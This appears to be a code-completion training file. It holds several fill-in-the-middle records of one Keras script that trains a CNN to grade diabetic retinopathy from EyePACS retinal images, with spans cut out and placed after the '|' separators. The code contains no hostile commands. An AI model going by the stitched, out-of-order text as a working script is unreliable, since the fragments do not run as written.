name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name))
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa')
plt.xlabel('epoch')
plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed) | identifier_body |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed)
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def get_experiment_id():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name))
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa') | plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | plt.xlabel('epoch') | random_line_split |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed)
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def get_experiment_id():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
|
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa')
plt.xlabel('epoch')
plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | try:
